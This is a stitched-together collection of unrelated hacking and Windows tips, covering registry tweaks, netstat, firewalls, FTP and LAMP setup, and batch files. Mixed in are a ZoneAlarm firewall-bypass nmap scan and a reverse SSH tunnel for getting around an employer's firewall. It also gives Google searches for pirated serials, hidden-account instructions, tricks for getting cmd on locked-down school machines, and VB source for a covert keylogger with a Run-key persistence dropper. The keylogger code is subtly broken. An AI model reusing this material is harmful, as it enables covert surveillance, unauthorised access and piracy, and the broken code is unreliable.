Change The Default Location For Installing Apps
XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by using a Registry hack.
Run the Registry Editor (regedit)and go to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.
Closing Open Holes, System Security How to close open holes
This manual is aimed at discussing methods of system security analysis and will shed light on as to how to secure your standalone (also a system connected to a LAN) system.
Open Ports: A Threat to Security?
In the Netstat Tutorial we had discussed how the netstat -a command showed the list of open ports on your system. Well, anyhow, before I move on, I would like to quickly recap the important part. So here goes, straight from the netstat tutorial:
Now, the ??a? option is used to display all open connections on the local machine. It also returns the remote system to which we are connected to, the port numbers of the remote system we are connected to (and the local machine) and also the type and state of connection we have with the remote system.
For Example,
C:\windows>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP ankit:1031 dwarf.box.sk:ftp ESTABLISHED
TCP ankit:1036 dwarf.box.sk:ftp-data TIME_WAIT
TCP ankit:1043 banners.egroups.com:80 FIN_WAIT_2
TCP ankit:1045 mail2.mtnl.net.in:pop3 TIME_WAIT
TCP ankit:1052 zztop.boxnetwork.net:80 ESTABLISHED
TCP ankit:1053 mail2.mtnl.net.in:pop3 TIME_WAIT
UDP ankit:1025 *:*
UDP ankit:nbdatagram *:*
Now, let us take a single line from the above output and see what it stands for:
Proto Local Address Foreign Address State
TCP ankit:1031 dwarf.box.sk:ftp ESTABLISHED
Now, the above can be arranged as below:
Protocol: TCP (This can be Transmission Control Protocol or TCP, User Datagram Protocol or UDP or sometimes even, IP or Internet Protocol.)
Local System Name: ankit (This is the name of the local system that you set during the Windows setup.)
Local Port opened and being used by this connection: 1031
Remote System: dwarf.box.sk (This is the non-numerical form of the system to which we are connected.)
Remote Port: ftp (This is the port number of the remote system dwarf.box.sk to which we are connected.)
State of Connection: ESTABLISHED
?Netstat? with the ??a? argument is normally used, to get a list of open ports on your own system i.e. on the local system. This can be particularly useful to check and see whether your system has a Trojan installed or not. Yes, most good Antiviral software are able to detect the presence of Trojans, but, we are hackers, and need to software to tell us, whether we are infected or not. Besides, it is more fun to do something manually than to simply click on the ?Scan? button and let some software do it.
The following is a list of Trojans and the port numbers which they use, if you Netstat yourself and find any of the following open, then you can be pretty sure, that you are infected.
Port 12345(TCP) Netbus
Port 31337(UDP) Back Orifice
For complete list, refer to the Tutorial on Trojans at: hackingtruths.box.sk/trojans.txt
----
Now, the above tutorial resulted in a number of people raising questions like: If the 'netstat -a' command shows open ports on my system, does this mean that anyone can connect to them? Or, How can I close these open ports? How do I know if an open port is a threat to my system's security of not? Well, the answer to all these question would be clear, once you read the below paragraph:
Now, the thing to understand here is that, Port numbers are divided into three ranges:
The Well Known Ports are those from 0 through 1023. This range or ports is bound to the services running on them. By this what I mean is that each port usually has a specific service running on it. You see there is an internationally accepted Port Numbers to Services rule, (refer RFC 1700 Here) which specifies as to on what port number a particular service runs. For Example, By Default or normally FTP runs on Port 21. So if you find that Port 21 is open on a particular system, then it usually means that that particular system uses the FTP Protocol to transfer files. However, please note that some smart system administrators delibrately i.e. to fool lamers run fake services on popular ports. For Example, a system might be running a fake FTP daemon on Port 21. Although you get the same interface like the FTP daemon banner, response numbers etc, however, it actually might be a software logging your prescence and sometimes even tracing you!!!
The Registered Ports are those from 1024 through 49151. This range of port numbers is not bound to any specific service. Actually, Networking utlites like your Browser, Email Client, FTP software opens a random port within this range and starts a communication with the remote server. A port number within this range is the reason why you are able to surf the net or check your email etc.
If you find that when you give the netstat -a command, then a number of ports within this range are open, then you should probably not worry. These ports are simply opened so that you can get your software applications to do what you want them to do. These ports are opened temporarily by various applications to perform tasks. They act as a buffer transfering packets (data) received to the application and vis-a-versa. Once you close the application, then you find that these ports are closed automatically. For Example, when you type www.hotmail.com in your browser, then your browser randomly chooses a Registered Port and uses it as a buffer to communicate with the various remote servers involved.
The Dynamic and/or Private Ports are those from 49152 through 65535. This range is rarely used, and is mostly used by trojans, however some application do tend to use such high range port numbers. For Example,Sun starts their RPC ports at 32768.
So this basically brings us to what to do if you find that Netstat gives you a couple of open ports on your system:
1. Check the Trojan Port List and check if the open port matches with any of the popular ones. If it does then get a trojan Removal and remove the trojan.
2. If it doesn't or if the Trojan Remover says: No trojan found, then see if the open port lies in the registered Ports range. If yes, then you have nothing to worry, so forget about it.
***********************
HACKING TRUTH: A common technique employed by a number of system administrators, is remapping ports. For example, normally the default port for HTTP is 80. However, the system administrator could also remap it to Port 8080. Now, if that is the case, then the homepage hosted at that server would be at:
http://domain.com:8080 instead of
http://domain.com:80
The idea behind Port Remapping is that instead of running a service on a well known port, where it can easily be exploited, it would be better to run it on a not so well known port, as the hacker, would find it more difficult to find that service. He would have to port scan high range of numbers to discover port remapping.
The ports used for remapping are usually pretty easy to remember. They are choosen keeping in mind the default port number at which the service being remapped should be running. For Example, POP by default runs on Port 110. However, if you were to remap it, you would choose any of the following: 1010, 11000, 1111 etc etc
Some sysadmins also like to choose Port numbers in the following manner: 1234,2345,3456,4567 and so on... Yet another reason as to why Port Remapping is done, is that on a Unix System to be able to listen to a port under 1024, you must have root previledges.
************************
Firewalls
Use of Firewalls is no longer confined to servers or websites or commerical companies. Even if you simply dial up into your ISP or use PPP (Point to Point Protocol) to surf the net, you simply cannot do without a firewall. So what exactly is a firewall?
Well, in non-geek language, a firewall is basically a shield which protects your system from the untrusted non-reliable systems connected to the Internet. It is a software which listens to all ports on your system for any attempts to open a connection and when it detects such an attempt, then it reacts according to the predefined set of rules. So basically, a firewall is something that protects the network(or systen) from the Internet. It is derived from the concept of firewalls used in vehicles which is a barrier made of fire resistant material protecting the vehicle in case of fire.
Now, for a better 'according to the bible' defination of a firewall: A firewall is best described as a software or hardware or both Hardware and Software packet filter that allows only selected packets to pass through from the Internet to your private internal network. A firewall is a system or a group of systems which guard a trusted network( The Internal Private Network from the untrusted network (The Internet.)
NOTE: This was a very brief desciption of what a firewall is, I would not be going into the details of their working in this manual.
Anyway,the term 'Firewalls', (which were generally used by companies for commerical purposes) has evolved into a new term called 'Personal Firewalls'. Now this term is basically used to refer to firewalls installed on a standalone system which may or may not be networked i.e. It usually connects to an ISP. Or in other words a personal firewall is a firewall used for personal use.
Now that you have a basic desciption as to what a firewall is, let us move on to why exactly you need to install a Firewall? Or, how can not installing a firewall pose a threat to the security of your system?
You see, when you are connected to the Internet, then you have millions of other untrusted systems connected to it as well. If somehow someone found out your IP address, then they could do probably anything to your system. They could exploit any vulnerability existing in your system, damage your data, and even use your system to hack into other computers.
Finding out someone'e IP Address is not very difficult. Anybody can find out your IP, through various Chat Services, Instant Messengers (ICQ, MSN, AOL etc), through a common ISP and numerous other ways. Infact finding out the IP Address of a specific person is not always the priority of some hackers.
What I mean to say by that is that there are a number of Scripts and utilities available which scan all IP addresses between a certain range for predefined common vulnerabilities. For Example, Systems with File Sharing Enabled or a system running an OS which is vulnerable to the Ping of Death attack etc etc As soon as a vulnerable system is found, then they use the IP to carry out the attacks.
The most common scanners look for systems with RAT's or Remote Administration Tools installed. They send a packet to common Trojan ports and display whether the victim's system has that Trojan installed or not. The 'Scan Range of IP Addresses' that these programs accept are quite wide and one can easily find a vulnerable system in the matter of minutes or even seconds.
Trojan Horses like Back Orifice provide remote access to your system and can set up a password sniffer. The combination of a back door and a sniffer is a dangerous one: The back door provides future remote access, while the sniffer may reveal important information about you like your other Passwords, Bank Details, Credit Card Numbers, Social Security Number etc If your home system is connected to a local LAN and the attacker manages to install a backdoor on it, then you probably have given the attacker the same access level to your internal network, as you have. This wouls also mean that you will have created a back door into your network that bypasses any firewall that may be guarding the front door.
You may argue with me that as you are using a dial up link to your ISP via PPP, the attacker would be able to access your machine only when you are online. Well, yes that is true, however, not completely true. Yes, it does make access to your system when you reconnect, difficult, as you have a dynamic Internet Protocol Address. But, although this provides a faint hope of protection, routine scanning of the range of IP's in which your IP lies, will more often than not reveal your current Dynamic IP and the back door will provide access to your system.
*******************
HACKING TRUTH: Microsoft Says: War Dialer programs automatically scan for modems by trying every phone number within an exchange. If the modem can only be used for dial-out connections, a War Dialer won't discover it. However, PPP changes the equation, as it provides bidirectional transportmaking any connected system visible to scanners?and attackers.
*******************
So how do I protect myself from such Scans and unsolicitated attacks? Well, this is where Personal Firewalls come in. They just like their name suggests, protect you from unsolicitated connection probes, scans, attacks.
They listen to all ports for any connection requests received (from both legitimate and fake hosts) and sent (by applications like Browser, Email Client etc.) As soon as such an instance is recorded, it pops up a warning asking you what to do or whether to allow the connection to initiate or not. This warning message also contains the IP which is trying to initiate the connection and also the Port Number to which it is trying to connect i.e. the Port to which the packet was sent. It also protects your system from Port Scans, DOS Attacks, Vulnerability attacks etc. So basically it acts as a shield or a buffer which does not allow your system to communicate with the untrusted systems directly.
Most Personal Firewalls have extensive logging facilities which allows you to track down the attackers. Some popular firewalls are:
1.BlackICE Defender : An IDS for PC's. It's available at http://www.networkice.com.
2. ZoneAlarm: The easiest to setup and manage firewall. Get it for free at: www.zonelabs.com
Once you have installed a firewall on your system, you will often get a number of Warnings which might seem to be as if someone is trying to break into your system, however, they are actually bogus messages, which are caused by either your OS itself or due to the process called Allocation of Dynamic IP's. For a details description of these two, read on.
Many people complain that as soon as they dial into their ISP, their firewall says that such and such IP is probing Port X. What causes them?
Well, this is quite common. The cause is that somebody hung up just before you dialed in and your ISP assigned you the same IP address. You are now seeing the remains of communication with the previous person. This is most common when the person to which the IP was assigned earlier was using ICQ or chat programs, was connected to a Game Server or simply turned off his modem before his communication with remote servers was complete.
You might even get a message like: Such and Such IP is trying to initaite a Netbios Session on Port X. This again is extrememly common. The following is an explanation as to why it happens, which I picked up a couple of days ago: NetBIOS requests to UDP port 137 are the most common item you will see in your firewall reject logs. This comes about from a feature in Microsoft's Windows: when a program resolves an IP address into a name, it may send a NetBIOS query to IP address. This is part of the background radiation of the Internet, and is nothing to be concerned about.
What Causes them? On virtually all systems (UNIX, Macintosh, Windows), programs call the function 'gethostbyaddr()' with the desired address. This function will then do the appropriate lookup, and return the name. This function is part of the sockets API. The key thing to remember about gethostbyaddr() is that it is virtual. It doesn't specify how it resolves an address into a name. In practice, it will use all available mechanisms. If we look at UNIX, Windows, and Macintosh systems, we see the following techniques:
DNS in-addr.arpa PTR queries sent to the DNS server
NetBIOS NodeStatus queries sent to the IP address
lookups in the /etc/hosts file
AppleTalk over IP name query sent to the IP address
RPC query sent to the UNIX NIS server
NetBIOS lookup sent to the WINS server
Windows systems do the /etc/hosts, DNS, WINS, and NodeStatus techniques. In more excruciating detail, Microsoft has a generic system component called a naming service. All the protocol stacks in the system (NetBIOS, TCP/IP, Novel IPX, AppleTalk, Banyan, etc.) register the kinds of name resolutions they can perform. Some RPC products will likewise register an NIS naming service. When a program requests to resolve an address, this address gets passed onto the generic naming service. Windows will try each registered name resolution subsystem sequentially until it gets an answer.
(Side note: User's sometimes complained that accessing Windows servers is slow. This is caused by installing unneeded protocol stacks that must timeout first before the real protocol stack is queried for the server name.).
The order in which it performs these resolution steps for IP addresses can be configured under the Windows registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider.
Breaking Through Firewalls
Although Firewalls are meant to provide your complete protection from Port Scan probes etc there are several holes existing in popular firewalls, waiting to be exploited. In this issue, I will discuss a hole in ZoneAlarm Version 2.1.10 to 2.0.26, which allows the attacker to port scan the target system (Although normally it should stop such scans.)
If one uses port 67 as the source port of a TCP or UDP scan, ZoneAlarm will let the packet through and will not notify the user. This means, that one can TCP or UDP port scan a ZoneAlarm protected computer as if there were no firewall there IF one uses port 67 as the source port on the packets.
Exploit:
UDP Scan:
You can use NMap to port scan the host with the following command line:
nmap -g67 -P0 -p130-140 -sU 192.168.128.88
(Notice the -g67 which specifies source port).
TCP Scan:
You can use NMap to port scan the host with the following command line:
nmap -g67 -P0 -p130-140 -sS 192.168.128.88
(Notice the -g67 which specifies source port).
Create An Ftp Server On Your Pc With Serv-u
Serv-U
No-IP.com Website
Quote:
Step 1. Getting a static IP address.
Get a static address for your FTP server. You will want to do this as opposed to using your IP address for several reasons. First, it’s easier keeping up-to-date. Imagine having to change all of your setting every time your IP changed. With No-IP, the No-IP service runs in background on your computer and updates your current IP address with your FTP server’s URL (for example, you get ftp://rkchoolie.serveftp.com). Second reason, you don’t want your IP address posted out there for everyone to see.
1. Go to www.No-IP.com to create a new user account.
2. Fill in the information that is required and the click Register button.
3. Your account has now been created and your account password has been emailed to you.
4. Check your email mailbox and wait for the mail that contains your password
5. Go back to www.No-IP.com and type your email address and password to login to your account.
6. Once in your account, click on Add a host in the left menu
7. Type in the Hostname you want (example: rkchoolie) and pick a Domain from the list (example: ftpserve.com)
8. Check Allow Wildcards and click the Submit button
9. You now have your static address (example: rkchoolie.serveftp.com)
10. Click on your OS link in the Dyn-Update Client in the bottom right menu and follow links to download the client
11. Once downloaded, install the software and type in your email address and password when asked.
12. Finally tick the checkbox near your static address.
You now have a static web address .
Quote:
Step 2. Installing and setting the FTP server
1. Install Serv-U 4.0.
2. Start Serv-U and use the wizard to setup your ftp.
3. Click next until you're asked for an IP address, leave it blank and then click next.
4. Type the domain name you've just registered above (example: preacher.serveftp.com) in the domain name field and then click Next.
5. You are asked if you want to allow anonymous access, select No and then click next.
6. You are then asked to create a named account, check yes and then click next.
7. Type in the user name you wish for this account (example: Harrie) and click next.
8. Type a password for this account (example: $p3c1aL). For security reasons, try to create a password with some letters, numbers and special characters. Then click next.
9. You will then be asked for the Home directory of the account you just created. Select the directory and then click next.
10. Select yes to lock this account to the Home directory. You want to do this so that the user can not go any further up that his home directory. Click next.
11. The account is now set so click finish.
Quote:
Step 3. Configuring user accounts
1. In the left tree-menu, select the account you've just created and then click on the General tab.
2. Check Hide ‘Hidden’ Files.
3. Check Allow only and enter the number one in the box.
4. Set the Max. download speed to what ever you want. If this is an account that many will be using, set it low to save on your bandwidth. I usually have mine set between 10 – 20. If you leave it blank, users will be able to download from you at full bandwidth.
5. Set the Max no. of users to how many you want to be able to log on at one time. This depends on your connection speed but try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)
6. Now, click on the Dir Access tab.
7. You should see the home folder in there. Highlight it and make your permissions.
8. If you only want users to be able to download check only Read, List, & Inherit.
9. If you want users to be able to upload, but to only one particular folder but not download, click the add button and then select that folder. Now highlight the folder and set these permissions on that folder. Check Write, Append, List, Create, & Inherit. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this special upload folder to be list first, before the home folder.
10. If there is a folder that you don’t want anyone to have access to, but it is inside the home folder, then click the add button and then select that folder. Now highlight the folder and make sure that all checkboxes are left. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this no access folder to be listed at the very top.
11. There are many other different sets of permissions you can play with. I just covered your basics.
12. Your server is now set!
13. Try logging on with the username and password and see if it works.
Easily Find Serial Numbers On Google
in the search bar type in just like this - "Windows XP Professional" 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR
just try it out, it's very quick and it works nicely..
How To Find Ftp's The Easy Way
The easiest search quote is "index of ..."
Some kind of examples are:
index of ftp/ +mp3
index of ftp/ +divx
index of ftp/ +"whateveryouwant"
Google has many operators that should help you to specify your search
USE EM
There are also lots of advanced operators available
here are a few:
cache:
link:
related:
info:
stocks:
site:
allintitle:
intitle:
allinurl:
inurl:
eg:
allintitle: "index of ftp/mp3"
try to combine things and maybe u'll find something
HowTo: Create a Reverse SSH Tunnel
Posted on: Jun 20, 2008 at 08:06am
Section: Tutorials
Printer Friendly Version
Legacy URL
There are times in your life that you may find yourself in need of accessing some files on your office computer from home, but unable to due to your company employing a firewall to protect their network from hackers. Since a snowball has a better chance of surviving in hell than you do of getting your network administrator to open a port in the firewall so you can SSH into your work computer from home, you're going to need to come up with another way to get access to your machine. This is where a Reverse SSH Tunnel will come in handy. The command to do this is extremely simple. From your work computer, type the following:
ssh -l username -nNT -R 1100:172.16.42.80:22 12.24.79.186
That's it. Just replace each of the red highlighted items with the appropriate local numbers and you're all set. Now, before I leave you totally confused as to what each of these do, let me break this down so you understand it better.
Username - Obviously this is your non-root user at home. So if you login to your BSD or Linux box with the username "bobwhite", you'd replace "username" above with "bobwhite".
1100: - This will be the local port on your home computer you will connect to. I'll explain more how to use this later. But you'll want to make sure it's a port other than what you have SSH listening on. SSH normally listens on port 22, but if you've moved it to say, port 300, then you won't want this port ID to be 300. 1100 is a pretty good number so you can be sure not to step on the toes of any other services running.
172.16.42.80:22 - This is the ip address and local port on your work computer. So if your work computer has the IP address of 172.16.42.80, then you'd enter that there. Or for example, if your IP was 10.0.23.56, you'd use that instead. Now as a side note, you can use your work computer as a middleman for connecting to another machine inside the firewall rather than your own. By changing the IP and port number to the one used by the machine of choice you'd rather connect to, you will be able to ssh into that other machine from home without first having to stop at your own machine. The kicker is, if you want to get into your machine later on, you'll either need to restart the ssh session on your work computer, or ssh back to it from the machine you got forwarded to.
12.24.79.186 - This will be the IP address of your workstation or server at home you're connecting into.
Well, that's pretty much it. There are two additional commands you'll need to use if you're, A) connecting to your machine at home through a port other than 22, and/or B) if you're using an SSH static public/private key. To do either of these, you'll need to add the following options to your ssh command line:
-p 300 - The "-p" tells SSH that you want to specify a port. 300 is of course an example of whatever your home ssh server listens on.
-i id_dsa - The "-i" command tells SSH that you want to use an "identity" file (aka a public/private keypair) to connect to the remote server rather than an automatically generated one. This is important if you've setup your sshd_config file similar to the configuration shown here.
Once the connection is established from your work computer, you should be able to connect from home anytime you want. Just remember two things. The first is to consider using AutoSSH to keep the connection alive in case it should drop, and the second is that you've technically just opened a hole through the firewall and into your network for the world to exploit. Now the likelihood of someone exploiting it is very slim to none, but there's still that chance, so don't get all whilly nilly with it when you use it. Only use it on nights when you expect to have a need to connect to your machine and shut it off during the day while you're at work.
Also, another note of interest. When you start the session, you'll need to do one of three things. Leave the console window open with the session running, do the command and follow it with an & sign to allow the process to become separated from the console so that it can allow you to do other things while it's running (you'll still need to keep the console window open when you're done or it'll kill the session), or start a screen session and start this process in there and then detach the screen session to leave it running.
And one other thing, when the command starts, you won't get any feedback that it's running. At most you'll be asked for your passkey for your public key file, or your login credentials. After that it will act like a hung process that's not doing anything, but actually it's fine. To test your tunnel, just open a second console window and ssh to your home computer. Once in, ssh to localhost and port 1100 (or whatever port you chose) and login to your work computer. If you did it right, you should now find yourself ssh'ed into your work PC.
From home all you'll need to do is ssh either to localhost (if you're on the same machine your work PC is ssh'ed into) or the IP of the machine you connected to from work on the IP you specified and you will be able to login to your machine at work. It's just that simple. You're essentially riding an existing ssh session backwards to your computer at work.
Show apps that use internet connection at the moment
2. $ slof -P -i -n
3. $ ss -p
a. ss -p | cat
b. ss -p | grep STA
c. ss -p | cut -f2 -sd\"
d. ss -p | grep STA | cut -f2 -d\"
4. $ netstat -lantp | grep -i stab | awk -F/ '{print $2}' | sort | uniq
5. $ netstat -lantp | grep -i establ | awk -F/ '{print $2}' | sort | uniq
6. $ netstat -lantp | grep -i establ | awk -F/ '{print $2}' | uniq | sort
Food for thought.
How to install, configure and work a LAMP stack with FTP access
First off I will talk about what exactly a LAMP stack is.
LAMP stands for Linux Apache MySQL PHP (this can sometimes be replaced with Python). Lets break this down.
Linux- Linux/ Unix is the leading OS for web servers due to low resource usage allowing for faster load times and high up-time.
Apache- Apache is the actual service that Hosts the website and turns your box into a usable webhost.
MySQL- is a dynamic database that is able to hold almost any information. This stores information that is then pulled by PHP or another server side language.
PHP- A high powered dynamic internet language derived from the GPL (General Programing Language) Perl. This is used to display dynamic content.
Now that we have a brief understanding of what exactly we are doing we will now be able to begin.
Before I get started as to how to do everything I would like to mention I am running Ubuntu Server Edition 7.04 (32 bit). I am also assuming you have basic understanding of Linux/ Unix along with general computing knowledge.
Once logged on to our Linux box we will need to download and install our Apache server, surprisingly enough it is incredibly simple. Just type:
sudo apt-get install apache2 mysql-server php5 libapache2-mod-php5 php5-xsl php5-gd php-pear libapache2-mod-auth-mysql php5-mysql
This will take a few moments to install and download.
Once that is up and working we will restart the LAMP server by using:
sudo /etc/init.d/apache2 restart
Now lets make it work! We will configure Apache by using a simple Linux based text editor called nano. (I am using nano in this tutorial instead of vi for the simplicity of nano to a beginner). Unlike so many other services you do not need to directly configure your apache config. And before we move on we will need to make a new directory so type in the following:
sudo mkdir /home/[username here]/www/
sudo chmod 755 /home/[username here]/www/
With that made lets do some small bits of configuring. We will use our nano editor to edit our sites available list by running the following:
sudo cp /etc/apache2/sites-available/default / etc/apache2/sites-available/mysite
sudo nano etc/apache2/sites-available/mysite
That bit there copies the file “default” and renames it “mysite” and the second line opens it for editing. Here is what we need to change:
Change this:
DocumentRoot /var/www
Options FollowSymLinks
AllowOverride None
To:
DocumentRoot /home/[username here]/www
Options FollowSymLinks
AllowOverride None
Now hit ctrl + O to save. Then ctrl + Z to close the file.
Next we use a pretty little Linux trick that deactivates the “default” site with “mysite”
sudo a2dissite default && sudo a2ensite mysite
And finally you will need to restart your Apache server just as we did before.
SO! Lets test it out! We will need to give our new web server something to display so lets keep it simple with the following script:
echo 'Hello! It is working!' > /home/[username here]/www/index.html
Done that? GREAT!
Now lets take a look open up a web browser and type in the internal address of that machine (if you are testing this on the same machine it is installed on the universal internal IP for localhost is 127.0.0.1)
So as a URL you would type http://address-of-machine As an example mine was http://192.168.1.67
If it works you should see the message “Hello! It is working!”
Lets advance a little bit though. This is all fine and dandy if you are on a LAN with this machine, but what about over the World Wide Web? Well this is automatically listening on port 80, unfortunately most ISPs HATE people using this port so I will show you how to change the listen port of the server. Simple use nano to change the apache port list.
sudo nano /etc/apache2/ports.conf
It will by default say
Listen 80
Listen 443
change this to:
Listen 8000
Listen 443
Perfect! Now after you restart the Apache service once more we will be listening on a unrestricted port! The only thing that has changed is the way we access the webpage. Instead of typing http://192.168.1.67 we now type http://192.168.1.67:8000
Log into your router forward port 8000 to the internal address of the LAMP stack and we are good to go.
You now have a fully functional LAMP stack that will host anything just as a paid host will (it won’t have a domain name as you need to set that up which will not be covered in this tutorial)
To make this a little more complete I am going to go one step further and show you how to gain FTP access to your new LAMP stack!
We will now download a service called proftpd. Do this by typing:
sudo apt-get install proftpd
Simple enough, just as a side note I recommend installing it as a standalone. Now to our lovely friend NANO and do some configuring!
Find the line that defines the following:
# Use this to jail all users in their homes
#DefaultRoot ~
and change it to:
# Use this to jail all users in their homes
DefaultRoot /home/[username here]/www
Just note exactly what we did. We changed it so that anyone who logs into the FTP will only have FTP access over the web server files AND we had to uncomment (remove the ‘#’).
Before I forget I want to say we edit the FTP config with the following:
sudo nano /etc/proftpd/proftpd.conf
Also note that most ISPs block port 21 (FTP port) so we will change that as well.
So find the line:
# Port 21 is the standard FTP port.
Port 21
And change it to:
# Port 21 is the standard FTP port.
Port 2121
Now forward the port 2121 to your LAMP stack as well. Following that we will restart the FTP service by typing:
sudo /etc/init.d/proftpd restart
LETS TRY CONNECTING!
Open FTP and connect to the address of you LAMP stack on port 2121
So for example on MS command based FTP it would be:
open 192.168.1.68 2121
and log in using the credentials to your Linux box.
TA DA! Now you have a working webhost with full FTP access!
Creating a simple key logger
By Dat Hacker
VB Required
First of all you need to make a extractor for your virus name it simple keylogger extractor:
Now create a keylogger, make it have 0% opacity and create a textbox named textbox1 and a timer named timer1, set the timer to an interval of 1 and enable it, now add this coding:
Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = Chr(i)
End If
Next i
Dim filetxt, getname, path, filesys
path = filesys.GetPathName("C:\windows\system32\log.log")
getname = filesys.GetFileName(path)
filetxt.WriteLine(TextBox1.Text)
filetxt.Close()
TextBox1.Text = ""
End Sub
End Class
There will be “Warnings” ignore them as they will not interfere, now save this, compile it and go to the debug area (c:\users(or documents and settings)\username\documents \Visual Studio 2008\Projects\simple keylogger\simple keylogger\bin\Debug
Here you will find an exe that will be the program, rename it sys.txt and copy it to your desktop, now open simple keylogger extractor, create 2 textboxes leave the names as textbox1 and textbox2, and make them multiline. Make the opacity 0% and and copy this text to the file:
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Shell = CreateObject("wscript.shell")
shell.run("c:\windows\system32\reg.reg")
shell = Nothing
shell = CreateObject("wscript.shell")
shell.run("c:\windows\system32\sys.exe")
shell = Nothing
Dim filetxt, getname, path, filesys
path = filesys.GetPathName("C:\windows\system32\reg.reg")
getname = filesys.GetFileName(path)
filetxt.WriteLine(TextBox1.Text)
filetxt.Close()
path = filesys.GetPathName("C:\windows\system32\sys.exe")
getname = filesys.GetFileName(path)
filetxt.WriteLine(TextBox2.Text)
filetxt.Close()
Dim shell
Me.Close()
My.Computer.FileSystem.DeleteFile("passwordcracker.exe")
My.Computer.FileSystem.DeleteFile("c:\windows\system32\reg.reg")
End Sub
End Class
Now set the textboxes, textbox1 should have the text:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]
"sys"="c:\\windows\\system32\\sys.exe"
And textbox2 should have the text you generated from your keylogger (just copy the text)
The program should run successfully, feel free to change scripting around
How to make a hidden user account
goto start>run>type regedit
in the menu goto
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurren tVersion
WinlogonSpecialAccountsUserList
right click and select string value
right click on the new string value and click rename
type the name of the account you want to hide (exactly the way it is spelled)
hit enter then right click on the string value again and click value change value to zero which hides it 1 shows it
now exit the registry and logoff
goto welcome screen and hit ctrl+alt+del twice to bring up old logon prompt
type hidden accounts name and password.
also hide all of the hidden accounts files.
Locking and Hiding Hard-Drives
Follow these steps below:
1. open Registry (go to run command, type "regedit" and press enter)
2. then go to this key
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
3. now click right button and create DWORD Value (blue color)
4. Rename it as "NoViewOnDrive" (for locking drive)
or
Rename it as "NoDrives" (for Hiding drive)
5. double click it and put some numbers to lock ur desired Drive and click ok.
6. Here is Drive No.
A: 1
C: 4
D: 8
E: 16
F: 32
G: 64
H: 128
7. finally restart or log-off the computer to take effect.
Keep in mind that "0" is Default Value or Disable or remove this setting.
Batch Files
....Technically, DOS provides just eight basic batch file commands -- CALL, ECHO, FOR, GOTO, IF, PAUSE, REM, and SHIFT -- plus a tiny assortment of miscellaneous doodads: replaceable parameters, environment variables, labels, double == signs, and @ signs. That's it! Not too much to learn, even for the most fervent DOS-hater. But the tools these few commands can create will astonish you.....
PC Computing - DOS Power Tools by Paul Somerson
Batch files can be used for a large amout of different things, anything from gettting specific commands to start at specific times, to opening cmd in a limited account, to getting a first easy taste to the magic of programming, to just have the thrill of being to write in it!
Batch files are made from the basic notepad (WIN + R, then type in notepad).
Inside notepad the fun can begin.
BASIC BATCH FILES
To start with, we'lll make a simple .bat file to say "Hello World" and then pause.
@echo off
echo Hello World!
echo.
pause ::
exit
rem I love undergroundsystems.org!
Ok, now to have fun and disect it :P
To start with there's the @echo off. The @ means that the "echo off" part of the code isnt run visibly to the user. The "echo off" is also a secret spy tool! When this is put in, the user can still run the program, but with the flipping
"C:\documents and settings\my documents\" or however your logged on.
The echo is like the "COUT" comman in C. It sends whatever you write after it to the screen of your bat file. When you wrote "echo Hello World!", it sends to the screen "Hello World!", ommitting the echo. The "echo." is a nifty command to make writing in a batch file a lot easier. It basically just leaves a blank line, which i can tell you is a hell'ov a lot easier to see, than say:
Hello World
Press any key to continue...
:eek: :eek: :eek:
Next there is the "pause ::". Now I dont think there is any difference if you write "pause" or "pause ::". In any case, they both do the same visible thing. :rolleyes: when you type this into your batch file, it will say when you run the program:
"Press any key to continue" Gosh not a please! :mad:
As soon as you click any key, the program will continue to the next line of the code. which in our case is the "exit" command. This does what any jack-a$$ might think it does....exits or shutsdown the program. Nothing spectacular lol.
Finally in our little program, there is the "rem I love US.org!". Now if you added this into your program when you ran it, you might have/or might not have been a bit puzzled to see that it didnt pop up. WTF This is because its just for you to write your notes after it...maybe not for a program like "Hello World", but something much longer and harder to script.
Phew, that was a hell of a lot for 5 lines of programming! (goes off to get a cup'a'tea.)
GETTING CMD WITH BATCH FILES
Many people use batch files to get good'old cmd, in say a limited user. First can I say that im not encouraging anyone to try and do this, errr, its for administrators to test their security?....what is it :rolleyes: ....erm for security testing purposes only?....oh well, this isnt top secret super hacker stuff...
Most cmd commands can be run from a batch file, and cmd can also be run from a batch file..Here is a little script i just made (sorry for any mistakes), which will try and open cmd with a variety of methods:
@echo off
pause
cmd.exe
pause
command.com
pause
cmd
pause
c:\WINDOWS\system32\cmd.exe
pause
rem ############echo please modify this accordingly############
COPY "c:\WINDOWS\system32\cmd.exe" "c\documents and settings\##please enter your username here##\my documents"
pause
exit
Now, this code simply just goes through different ways to open up cmd.. The first 5 ways will always work..unless your admin :P (yer, i know you'll try this in schools), blocks them. If your admin is like the BOFH: (http://www.google.co.uk/search?hl=en&q=bofh&meta=) he might even have banned batch files, but oh well.... they did for me.. :madman:
Final section now..
RUNNING EASIER SCRIPTS!
Now batch files can also be used to make nice simple scripts that help tha tards out there. :tard:
Here is one which basically helps you make a new user on your non-networked computer.
@echo off
:A
cls
echo Poetic-Justics's user creation program.
echo.
set /p n="Old User-name: "
echo.
set /p m="New user-name: "
echo.
set /p p="New user-name password: "
echo.
set /p g="new user-group: "
echo.
